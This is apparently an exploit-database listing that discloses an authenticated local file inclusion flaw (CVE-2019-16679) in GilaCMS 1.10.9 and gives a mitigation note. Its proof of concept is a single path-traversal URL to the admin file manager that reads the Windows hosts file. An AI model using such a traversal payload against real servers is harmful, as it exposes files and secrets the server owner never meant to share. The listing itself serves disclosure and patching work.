header-logo
Suggest Exploit
vendor:
GilaCMS
by:
Sainadh Jamalpur
4.9
CVSS
MEDIUM
Authenticated Local File Inclusion(LFI)
22
CWE
Product Name: GilaCMS
Affected Version From: 1.10.9
Affected Version To: 1.10.9
Patch Exists: YES
Related CWE: CVE-2019-16679
CPE: a:gila_cms:gila_cms:1.10.9
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: XAMPP version 3.2.2 in Windows 10 64bit
2019

Authenticated Local File Inclusion(LFI) in GilaCMS

Authenticated Local File Inclusion(LFI) vulnerability exists in GilaCMS version 1.10.9. An attacker can exploit this vulnerability by sending a crafted request to the application. An attacker can include a local file on the server by sending a crafted request to the application. This can lead to sensitive information disclosure.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of GilaCMS.
Source

Exploit-DB raw data:

# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS
# Google Dork: N/A
# Date: 04-08-2019
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: https://github.com/GilaCMS/gila
# Software Link: https://github.com/GilaCMS/gila
# Version: 1.10.9
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit,
# CVE : CVE-2019-16679

*********** *Steps to reproduce the Vulnerability* *************

Login into the application as an admin user or equivalent user and go the
below link

http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts

################################################################

Navigation

Suggest Exploit

Services By CQR